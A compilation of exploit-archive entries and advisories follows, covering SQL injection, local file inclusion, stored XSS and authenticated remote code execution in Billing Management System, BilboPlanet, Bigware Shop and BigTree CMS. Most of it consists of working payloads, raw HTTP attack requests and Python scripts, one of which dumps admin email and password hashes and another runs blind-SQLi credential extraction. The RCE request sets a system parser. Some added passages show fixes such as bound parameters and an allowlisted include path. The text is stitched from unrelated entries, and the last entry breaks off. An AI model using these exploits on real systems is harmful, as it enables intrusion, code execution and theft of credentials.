# Exploit Title: Billing Management System 2.0 - 'email' SQL injection Auth Bypass
# Date: 2021-02-16
# Exploit Author: Pintu Solanki
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14380/billing-management-system-php-mysql-updated.html
# Software: Billing Management System 2.0
# Vulnerability Type: SQL injection - Auth Bypass
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
# The login form passes the submitted username and password into its SQL query without escaping or parameter binding (SQL injection).
# Vulnerable Page: http://localhost/smartbilling/smartbilling_source_code/index.php
# Payload used:
Username => admin' or '1'='1
Password => admin' or '1'='1
# POC: Open the login page above and submit the payload in both the username and password fields. The injected or '1'='1 makes the login query's WHERE clause always true, so the application accepts the request and lands directly on the admin page without valid credentials.
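What the payload does to the login query, shown as an added example that is not the application's own code: the string-concatenated check beside the parameterised one, run against an in-memory SQLite table with a constructed admin row. The table layout, column names and the stored password are assumptions for the example.

```python
"""Added example: SQL injection auth bypass with admin' or '1'='1.
Not code from the Billing Management System; the users table below is
constructed for the demonstration."""
import sqlite3

PAYLOAD = "admin' or '1'='1"


def make_db():
    """Constructed sample data: one admin row with a password the attacker does not know."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 's3cret-unknown')")
    return conn


def rendered_query(username, password):
    """The SQL text a string-built login check actually sends."""
    return ("SELECT username FROM users WHERE username = '" + username +
            "' AND password = '" + password + "'")


def login_vulnerable(conn, username, password):
    """Builds the query by concatenation, the way the vulnerable login does.
    Returns the matched username or None."""
    row = conn.execute(rendered_query(username, password)).fetchone()
    return row[0] if row else None


def login_fixed(conn, username, password):
    """Same check with bound parameters: the payload is compared as data,
    so the quote and the OR never reach the SQL parser."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_db()
    # AND binds tighter than OR, so the trailing '1'='1' alone satisfies the WHERE
    print(rendered_query(PAYLOAD, PAYLOAD))
    print("vulnerable:", login_vulnerable(conn, PAYLOAD, PAYLOAD))
    print("fixed:     ", login_fixed(conn, PAYLOAD, PAYLOAD))
```

The rendered query reads `... WHERE username = 'admin' or '1'='1' AND password = 'admin' or '1'='1'`; because AND binds tighter than OR, the final `'1'='1'` makes the whole clause true and the first row (the admin) is returned.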
source: https://www.securityfocus.com/bid/62989/info
BilboPlanet is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://example.com/auth.php
(POST - user_id)
user_id=-1' or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
# Title: Bigware Shop 2.3.01 Multiple Local File Inclusion Vulnerabilities
# Author: bd0rk
# eMail: bd0rk[at]hackermail.com
# Twitter: twitter.com/bd0rk
# Tested on: Ubuntu-Linux
# Vendor: http://www.bigware.de
# Download: http://www.bigware.de/download/bigware_software_-_vollversion/Bigware_Shop.zip
Proof-of-Concept1:
/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_12.php source-line 58
**********************************************************************
require ( dirname(dirname(__FILE__)).'/language/'.$language.'.php');
**********************************************************************
[+]Sploit1: http://[target]/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_12.php?language=/../../../../yourFILE.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof-of-Concept2:
/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_115.php source-line 56
*********************************************************************
require ( dirname(dirname(__FILE__)).'/language/'.$language.'.php');
*********************************************************************
[+]Sploit: http://[target]/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_115.php?language=/../../../../yourFILE.php
=> Vuln-Description: $language is never initialised or validated before it reaches require(). The PoC relies on request variables being imported into the global scope (register_globals or an equivalent extract of user input), which lets an attacker set $language from the query string and traverse out of the language directory to include arbitrary local files. Note that '.php' is appended to the value, so the PoC URL as written includes yourFILE.php.php; name the target file without its extension.
=> Vendor-Solution: Initialise $language from a fixed allowlist of language codes, and reject any value containing path separators or '..', before it is used in require().
***Greetings fr0m Germany: zone-h.org-Team, exploit-db.com, GoLd_M, Kim Dotcom***
MERRY CHRISTMAS BRO'S! :)
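An added example (not Bigware code) of why the concatenated require() path above is a traversal hole and what the "declare before require" fix should look like: the naive path construction, a check that shows the PoC value escaping the language directory, and a hardened resolver with an allowlist pattern and a realpath containment check. The install path and the language-code pattern are assumptions for the example; the page does not list Bigware's language codes.

```python
"""Added example: local file inclusion via an unvalidated include path,
and a hardened resolver. Not Bigware code; paths are hypothetical."""
import os
import re

# Allowlisted language identifier shape: 'de', 'en', 'en_GB', ... (assumption)
LANG_RE = re.compile(r"^[a-z]{2,3}(_[A-Z]{2})?$")


def naive_include_path(base, language):
    """String concatenation exactly as the vulnerable require() does it:
    dirname(dirname(__FILE__)) . '/language/' . $language . '.php'"""
    return base + "/language/" + language + ".php"


def escapes_language_dir(base, language):
    """True when the naive path, once its '..' segments are resolved, lies
    outside <base>/language. This is what the PoC URL achieves."""
    lang_dir = os.path.realpath(base + "/language")
    target = os.path.realpath(naive_include_path(base, language))
    return os.path.commonpath([lang_dir, target]) != lang_dir


def safe_include_path(base, language):
    """Hardened form: validate the identifier against the allowlist pattern,
    then re-check that the resolved path is still inside the language
    directory. Raises ValueError instead of including anything else."""
    if not LANG_RE.match(language):
        raise ValueError("invalid language identifier: %r" % language)
    lang_dir = os.path.realpath(base + "/language")
    target = os.path.realpath(os.path.join(lang_dir, language + ".php"))
    if os.path.commonpath([lang_dir, target]) != lang_dir:
        raise ValueError("path escapes the language directory")
    return target


if __name__ == "__main__":
    base = "/var/www/Bigware_Shop/modules/basic_pricing"  # hypothetical install path
    for value in ("de", "/../../../../yourFILE"):
        print(repr(value), "naive ->", naive_include_path(base, value),
              "escapes:", escapes_language_dir(base, value))
        try:
            print("  safe ->", safe_include_path(base, value))
        except ValueError as err:
            print("  safe -> rejected:", err)
```

The allowlist alone would already stop the PoC; the containment check is kept as a second line of defence so a later change to the pattern cannot silently reopen the traversal.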
source: https://www.securityfocus.com/bid/53810/info
Bigware Shop is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Bigware Shop versions prior to 2.17 are vulnerable.
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import urllib.error
import urllib.parse
import urllib.request

# insert your target link here (with trailing slash)
url = "http://www.example.com/"

# error-based injection in the 'pollid' parameter: the duplicate-key error
# raised by the GROUP BY/RAND(0) trick leaks "email:password" of the first admin
sqli = ("2 AND (SELECT 1 FROM(SELECT COUNT(*), CONCAT((SELECT former_email_address "
        "FROM former where former_groups_id like 1 LIMIT 0,1), CHAR(58), (SELECT "
        "former_password FROM former where former_groups_id like 1 LIMIT 0,1),"
        "FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)")
postdata = {
    'voteid': '2',
    'pollid': sqli,
    'x': '1',
    'y': '1',
    'forwarder': 'http%3a%2f%2fdemoshop.bigware.org%2fmain_bigware_53.php%3fop%3dresults%26pollid%3d2',
}
headerdata = {'Content-type': 'application/x-www-form-urlencoded'}
request = urllib.request.Request(url + "main_bigware_54.php",
                                 data=urllib.parse.urlencode(postdata).encode(),
                                 headers=headerdata, method="POST")
try:
    with urllib.request.urlopen(request) as response:
        content = response.read()
except urllib.error.HTTPError as err:
    # a database error page usually comes back as HTTP 500; keep its body
    content = err.read()
print(content.decode(errors="replace"), "\n", "\n")
print("If there is an error stating the duplicate admin entry, your shop is vulnerable.")
# Exploit Title: BigTree CMS 4.4.10 - Remote Code Execution
# Google Dork: " BigTree CMS "
# Date: 2020-09-25
# Exploit Author: SunCSR (ThienNV and HoaVT - Sun* Cyber Security Research)
# Vendor Homepage: https://www.bigtreecms.org/
# Software Link: https://www.bigtreecms.org/
# Version: 4.4.10
# Tested on: Windows
# CVE : N/A
## 1. Authenticated Remote Code Execution
# Attack type: Remote
# Impact: Remote arbitrary code execution
# Affected component(s): /core/admin/field-types/list/draw.php
# Attack vectors: An authenticated user with the developer role can inject a system command via the "create new setting" function:
# Description: BigTree 4.4.10 and earlier are vulnerable to authenticated remote code execution. A developer-level user sends a crafted request that stores a list setting whose "parser" is set to system and whose list value is the command to run; the parser is applied to the list when the setting is loaded, so the command executes on the server.
# Severity (CVSS 3.1): Base Score: 9.1 CRITICAL
# POC: A developer creates the setting below; the command in "list" (here whoami) is executed when the settings are loaded:
POST /BigTreeCMS/site/index.php/admin/developer/settings/create/ HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 388
Origin: http://xxxx
Connection: close
Referer: http://xxxx/BigTreeCMS/site/index.php/admin/developer/settings/add/
Cookie: PHPSESSID=ipmr6c2jplqqlgcdrkgbtg4tfl; bigtree_admin[email]=tadmin%40bigtree.com; bigtree_admin[login]=%5B%22session-5f6d51f54fc301.14043773%22%2C%22chain-5f6d51f54fb248.84144127%22%5D
Upgrade-Insecure-Requests: 1
__csrf_token_PEFN3BUK0DAXK7Y10NJWT5E4813WXTXB__=tx6rzTz4ddDFI60tfcBe8tDN7lJ2YA3WlcdPLm/EbeY=&id=Test rce&name=Test rce&type=list&settings={"list_type":"static","allow-empty":"Yes","list":"whoami","pop-table":"","parser":"system"}&description=<p>Test rce</p>
# Video: https://vimeo.com/461667065
## 2. Authenticated SQL Injection
# Attack type: Remote
# Impact: Authenticated SQL injection in BigTree CMS
# Attack vectors: An authenticated user with the developer role can inject SQL via the "create new feed" function:
# Affected component(s): /core/feeds/custom.php
# Description: BigTree 4.4.10 and earlier are vulnerable to authenticated SQL injection. A developer-level user supplies an arbitrary value as the table name when creating or editing a custom feed; the value is placed into the feed's query unescaped, so the injected sleep(5) below delays the response (time-based confirmation).
# Severity (CVSS 3.1): Base Score: 7.2 HIGH
# POC: Request to create or edit a feed; the table field carries sqli_test union select sleep(5)# (URL-encoded below):
POST /site/index.php/admin/developer/feeds/create/ HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 379
Origin: http://xxxx
Connection: close
Referer: http://xxxx/site/index.php/admin/developer/feeds/add/
Cookie: yyyy
__csrf_token_RW2U3KT3JXVY70AKWPV9UHG3HWQ12PP4__=S0%2B7MADREPOzg1%2Fkht7xbgzv0uKqrRpuccn2gOmft88%3D&name=SQL+Injection&table=sqli_test+union+select+sleep(5)%23&type=custom&settings=%7B%22sort%22%3A%22%60id%60+ASC%22%2C%22limit%22%3A%222%22%2C%22parser%22%3A%22system%2Cexec%22%7D&description=as&fields%5Bid%5D%5Bwidth%5D=&fields%5Bid%5D%5Btitle%5D=ID&fields%5Bid%5D%5Bparser%5D=12
# Video: https://vimeo.com/461667107
## 3. Authenticated Stored Cross-Site Scripting
# Attack type: Remote
# Impact: Stored XSS
# Affected component(s): site/index.php/admin/pages/update
# Attack vector(s): An authenticated user can inject JavaScript via the create or update page function:
# Description: Stored XSS in BigTree 4.4.10 and earlier allows a remote authenticated user with low privilege (editor or publisher) to inject arbitrary web script or HTML via the page content submitted to site/index.php/admin/pages/update
# Severity (CVSS 3.1): Base Score: 6.5 MEDIUM
# POC: Request to create or edit a page (multipart body abbreviated; the payload sits in the page content field):
POST /BigTreeCMS/site/index.php/admin/pages/update/ HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------2320192840320212926996245368
Content-Length: 12173
Origin: http://xxx
Connection: close
Referer: http://xxxx/BigTreeCMS/site/index.php/admin/pages/edit/2/
Cookie: yyyy
---some fields here---
<p> <span class="s1"><em>These people are ridiculous and fake. This page is an example of a </em><a href="https://www.bigtreecms.org/docs/dev-guide/templates/" target="_blank" rel="noopener"><span class="s2"><em>basic template</em></span></a><em> with page content and a set of </em><a href="https://www.bigtreecms.org/docs/dev-guide/callouts/" target="_blank" rel="noopener"><span class="s2"><em>callouts</em></span></a><em>. Go to the </em><a href="https://www.bigtreecms.org/docs/dev-guide/installation/" target="_blank" rel="noopener"><span class="s2"><em>BigTree Developer Guide</em></span></a><em> for more.</em></span></p>
<p><span class="s1"><em>XSS here <script>alert(origin)</script></em></span></p>
-----------------------------2320192840320212926996245368
---some fields here---
# Video: https://vimeo.com/461667129
BigTree CMS 4.2.3: Multiple SQL Injection Vulnerabilities
Security Advisory – Curesec Research Team
Online-Reference:
http://blog.curesec.com/article/blog/BigTree-CMS-423-Multiple-SQL-Injection-Vulnerabilities-39.html
1. Introduction
Affected Product: BigTree CMS 4.2.3
Fixed in: 4.2.4
Fixed Version Link:
https://github.com/bigtreecms/BigTree-CMS/archive/4.2.3.zip
Vendor Contact: contribute@bigtreecms.org
Vulnerability Type: Multiple SQL Injections
Remote Exploitable: Yes
Reported to vendor: 07/07/2015
Disclosed to public: 08/07/2015
Release mode: Coordinated release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Vulnerability Description
Various components of the admin area of BigTree CMS are vulnerable
to SQL injection, which can lead to data leaks as well as compromise
of the host.
Please note that you have to be authenticated to exploit these issues.
SQL Injection 1
The script that processes page view requests passes the "id" GET request
value to functions which put this value directly into SQL queries. No
prepared statements or escaping is used, thus opening it up to SQL
injection.
Proof of Concept (show all BigTree users):
http://localhost//BigTree-CMS/site/index.php/admin/pages/view-tree/0' union all select 1,concat(email, ":", password),3,4,5,6,7,8,9,10 from bigtree_users %23/
Code:
core/admin/modules/pages/view-tree.php:151; page id is user controlled
$nav_visible =
array_merge($admin->getNaturalNavigationByParent($page["id"],1),$admin->getPendingNavigationByParent($page["id"]));
$nav_hidden =
array_merge($admin->getHiddenNavigationByParent($page["id"]),$admin->getPendingNavigationByParent($page["id"],""));
$nav_archived = $admin->getArchivedNavigationByParent($page["id"]);
core/inc/bigtree/admin.php:2638
static function getArchivedNavigationByParent($parent) {
[...]
$q = sqlquery("SELECT id,nav_title as
title,parent,external,new_window,template,publish_at,expire_at,path,ga_page_views
FROM bigtree_pages WHERE parent = '$parent' AND archived = 'on' ORDER BY
nav_title asc");
core/inc/bigtree/admin.php:3167
static function getHiddenNavigationByParent($parent) {
[...]
$q = sqlquery("SELECT id,nav_title as
title,parent,external,new_window,template,publish_at,expire_at,path,ga_page_views
FROM bigtree_pages WHERE parent = '$parent' AND in_nav = '' AND archived
!= 'on' ORDER BY nav_title asc");
core/inc/bigtree/admin.php:3758
static function getNaturalNavigationByParent($parent,$levels = 1) {
[...]
$q = sqlquery("SELECT id,nav_title AS
title,parent,external,new_window,template,publish_at,expire_at,path,ga_page_views
FROM bigtree_pages WHERE parent = '$parent' AND in_nav = 'on' AND
archived != 'on' ORDER BY position DESC, id ASC");
core/inc/bigtree/admin.php:4531
static function getPendingNavigationByParent($parent,$in_nav = true) {
[...]
$q = sqlquery("SELECT * FROM bigtree_pending_changes WHERE
pending_page_parent = '$parent' AND `table` = 'bigtree_pages' AND type =
'NEW' ORDER BY date DESC");
SQL Injection 2
When creating a new user, the email address is not checked server side,
so it is possible to set it to anything.
When logging in, the email address is saved in the session, and later
used to retrieve user data. This happens without prepared statements,
thus opening the query up to SQL injection.
Proof of Concept:
1. Create User
f'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10%23bar@example.com
2. Log in
3. result can be seen in multiple places
Code:
core/inc/bigtree/admin.php:81
$f = sqlfetch(sqlquery("SELECT * FROM bigtree_users WHERE id =
'".$_SESSION["bigtree_admin"]["id"]."' AND email =
'".$_SESSION["bigtree_admin"]["email"]."'"));
SQL Injection 3 (Blind)
The function used to calculate the SEO score of a post for Ajax requests
passes unsanitized user input to a function performing the actual
computation. This function does not use prepared statements, thus
opening it up to SQL injection. The result of the query is never echoed
to the end user, making this a blind SQL injection.
Proof of Concept (compare the two responses: the injected id changes the outcome of the title-uniqueness query, so the returned SEO score differs between the false and the true condition):
http://localhost//BigTree-CMS/site/index.php/admin/ajax/pages/get-seo-score
POST: content=foo&resources=bar&id=foo' or 1=2%23&title=Trees of All Sizes
http://localhost//BigTree-CMS/site/index.php/admin/ajax/pages/get-seo-score
POST: content=foo&resources=bar&id=foo' or 1=1%23&title=Trees of All Sizes
Code:
core/admin/ajax/pages/get-seo-score.php:4:
$seo = $admin->getPageSEORating($_POST,$_POST["resources"]);
core/inc/bigtree/admin.php:4222
static function getPageSEORating($page,$content) {
[...]
if ($page["title"]) {
$score += 5;
// They have a title, let's see if it's unique
$r = sqlrows(sqlquery("SELECT * FROM bigtree_pages WHERE
title = '".sqlescape($page["title"])."' AND id != '".$page["id"]."'"));
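The blind injection above, worked through as an added example rather than code from the advisory or from BigTree: a simplified stand-in for getPageSEORating over an in-memory SQLite database with constructed rows, and an extraction loop that uses nothing but the score difference between a true and a false injected condition to read a column of bigtree_users one character at a time. The scoring rule, the table contents and the SQLite-specific syntax (`--` comment, unicode()/substr()) are assumptions; the real target is MySQL, where the advisory's payload uses `#` and the equivalent functions are ASCII()/SUBSTRING().

```python
"""Added example: boolean-based blind SQL injection through an SEO score.
Not BigTree code; tables, rows and scoring are constructed."""
import sqlite3

# A title that does not exist in the constructed table: for an unknown title
# the uniqueness query returns rows only when the injected condition is true.
UNIQUE_TITLE = "Trees of No Size"


def make_db():
    """Constructed sample data standing in for the BigTree tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE bigtree_pages (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("CREATE TABLE bigtree_users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    conn.executemany("INSERT INTO bigtree_pages (title) VALUES (?)",
                     [("Trees of All Sizes",), ("About",)])
    conn.execute("INSERT INTO bigtree_users (email, password) "
                 "VALUES ('admin@example.com', '$2y$10$examplehash')")
    return conn


def title_is_unique(conn, title, page_id):
    """Mirrors the query in getPageSEORating: the title goes through
    sqlescape(), the id is concatenated raw. The rows are never shown."""
    safe_title = title.replace("'", "''")
    sql = ("SELECT COUNT(*) FROM bigtree_pages WHERE title = '" + safe_title +
           "' AND id != '" + page_id + "'")
    return conn.execute(sql).fetchone()[0] == 0


def seo_score(conn, title, page_id):
    """Simplified scoring (assumption): 5 for having a title, 5 more if it
    is unique. The score is the only thing the attacker observes."""
    score = 0
    if title:
        score += 5
        if title_is_unique(conn, title, page_id):
            score += 5
    return score


def oracle(conn, cond):
    """True when <cond> evaluates true inside the injected WHERE clause.
    SQLite uses '--' where the advisory's MySQL payload uses '#'."""
    page_id = "foo' or (" + cond + ")-- "
    return seo_score(conn, UNIQUE_TITLE, page_id) == 5


def extract(conn, column, max_len=64):
    """Boolean-based blind extraction of bigtree_users.<column> for user 1,
    one character at a time by binary search over the code point."""
    value = "(SELECT %s FROM bigtree_users WHERE id = 1)" % column
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(conn, "length(%s) >= %d" % (value, pos)):
            break  # past the end of the value
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, "unicode(substr(%s, %d, 1)) > %d" % (value, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    print("score with 1=2:", seo_score(db, UNIQUE_TITLE, "foo' or 1=2-- "))
    print("score with 1=1:", seo_score(db, UNIQUE_TITLE, "foo' or 1=1-- "))
    print("admin:", extract(db, "email"), extract(db, "password"))
```

Each character costs one length probe plus seven oracle requests; the loop stops when the length probe fails, so no guess about the value's size is needed.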
3. Solution
To mitigate this issue please upgrade at least to version 4.2.3:
https://github.com/bigtreecms/BigTree-CMS/archive/4.2.3.zip
Please note that a newer version might already be available.
4. Report Timeline
07/07/2015 Informed Vendor about Issue
07/08/2015 Vendor sent fixes for confirmation
07/10/2015 Fixes Confirmed
07/26/2015 Vendor releases Version 4.2.3
08/07/2015 Disclosed to public
# Exploit Title: BigTree CMS 4.2.23 - Cross-Site Scripting
# Date: 2018-10-15
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.bigtreecms.org/
# Software Link : https://github.com/bigtreecms/BigTree-CMS/
# Software : BigTree CMS
# Version : 4.2.23
# Vulnerability Type : Cross-site Scripting
# Vulnerability : Stored XSS
# CVE : CVE-2018-18308
# In version 4.2.23 of BigTree, a stored XSS vulnerability has been discovered
# in /admin/ajax/file-browser/upload/ (the image upload area). The payload is
# carried in the filename of the uploaded file, as shown in the request below.
# HTTP POST Request :
POST /admin/ajax/file-browser/upload/ HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://TARGET/admin/pages/add/0/
Content-Type: multipart/form-data; boundary=---------------------------15148507251045999311737722822
Content-Length: 1574699
Cookie: __utma=242042641.1054742390.1539547796.1539547796.1539547796.1; __utmb=242042641.6.10.1539547796; __utmc=242042641; __utmz=242042641.1539547796.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); PHPSESSID=fat2c61gglprnotletf1mobnui; hide_bigtree_bar=; bigtree_admin[email]=test%40ismailtasdelen.me; bigtree_admin[login]=%5B%22session-5bc3a4ae5b8016.12355027%22%2C%22chain-5bc3a4ae5b7966.37991866%22%5D; bigtree_admin%5Bpage_properties_open%5D=on
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------15148507251045999311737722822
Content-Disposition: form-data; name="__csrf_token_B2FHVMV815XHACWV8RVV2BTX1EH1YEH6__"
tNvtUi8PU/IDcrgxj1t/Uv/1ciYeF7AudslXD429hkQ=
-----------------------------15148507251045999311737722822
Content-Disposition: form-data; name="folder"
0
-----------------------------15148507251045999311737722822
Content-Disposition: form-data; name="files[]"; filename="\"><img src=x onerror=alert(\"ismailtasdelen\")>.jpg"
Content-Type: image/jpeg
1. ADVISORY INFORMATION
========================================
Title: BigTree CMS <= 4.2.11 Authenticated SQL Injection Vulnerability
Application: BigTree CMS
Remotely Exploitable: Yes
Versions Affected: < 4.2.11
Vendor URL: https://www.bigtreecms.org
Bugs: SQL Injection
Author: Mehmet Ince
Date of found: 27 Jun 2016
2. CREDIT
========================================
This vulnerability was identified during an external penetration test
by Mehmet INCE from PRODAFT / INVICTUS.
Netsparker was used for initial detection.
3. DETAILS
========================================
The following code shows that the $page variable is used inside an SQL
query without proper escaping and without PDO prepared statements.
File : /core/inc/bigtree/admin.php
Lines 6866 - 6879
function submitPageChange($page,$changes) {
if ($page[0] == "p") {
// It's still pending...
$type = "NEW";
$pending = true;
$existing_page = array();
$existing_pending_change = array("id" => substr($page,1));
} else {
// It's an existing page
$type = "EDIT";
$pending = false;
$existing_page = BigTreeCMS::getPage($page);
$existing_pending_change = sqlfetch(sqlquery("SELECT id FROM
bigtree_pending_changes WHERE `table` = 'bigtree_pages' AND item_id =
'$page'"));
}
...
}
The submitPageChange function is therefore vulnerable to SQL injection.
It is called from two places in the code base; the following list shows
the callers.
/core/admin/modules/pages/front-end-update.php
/core/admin/modules/pages/update.php
PoC:
The following HTTP POST request was used to exploit the SQL injection
flaw. The injection is in the "page" form field and uses the error-based
duplicate-key technique (COUNT(*) with GROUP BY over FLOOR(RAND(0)*2)).
POST /site/index.php/admin/pages/update/ HTTP/1.1
Cache-Control: no-cache
Referer: http://10.0.0.154/site/index.php/admin/pages/edit/2/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Cookie: PHPSESSID=amsscser3eg7fkljpjjt78ki17; hide_bigtree_bar=; bigtree_admin[email]=mehmet%40mehmetince.net; bigtree_admin[login]=%5B%22session-5770eca81c6d86.91986415%22%2C%22chain-5770ec71e2d7d3.28696204%22%5D; PHPSESSID=lsrbe949jc3na5j1sof19a3s53
Host: 10.0.0.154
Accept-Encoding: gzip, deflate
Content-Length: 2248
Content-Type: multipart/form-data; boundary=b788b047b8e345b792cdc1f81fef2106
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="MAX_FILE_SIZE"
2097152
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="_bigtree_post_check"
success
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="page"
-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="nav_title"
The Trees
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="title"
The Trees
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="publish_at"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="expire_at"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="in_nav"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="redirect_lower"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="trunk"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="external"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="new_window"
Yes
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="resources[page_header]"
The Trees
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="tag_entry"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="route"
trees
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="seo_invisible"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="ptype"
Save
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="max_age"
3
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="template"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="meta_keywords"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="meta_description"
--b788b047b8e345b792cdc1f81fef2106--
4. TIMELINE
========================================
27 Jun 2016 - Netsparker identified SQL Injection.
27 Jun 2016 - Source code review and finding root cause of SQLi.
27 Jun 2016 - Issue resolved by PRODAFT / INVICTUS team.
27 Jun 2016 - Pull request sent:
https://github.com/bigtreecms/BigTree-CMS/pull/256
--
Sr. Information Security Engineer
https://www.mehmetince.net
===========================================================================================
# Exploit Title: BigTree CMS - 'parent' SQL Inj.
# Dork: N/A
# Date: 24-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.bigtreecms.org/
# Software Link: https://www.bigtreecms.org/download/core/
# Version: v4.3.4
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: We strongly believe your content managements system
shouldn't require
you to compromise your vision. BigTree is an extremely extensible open
source CMS built on PHP and MySQL.
It was created by the expert designers, strategists, and developers at
Fastspot to help you make and maintain better websites.
===========================================================================================
# POC - SQLi
# Parameters : parent
# Attack Pattern :
-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27
# POST Method :
http://localhost/BigTree-CMS/site/index.php/admin/pages/create/
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: BigTree CMS - 'page' SQL Inj.
# Dork: N/A
# Date: 24-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.bigtreecms.org/
# Software Link: https://www.bigtreecms.org/download/core/
# Version: v4.3.4
# Category: Webapps
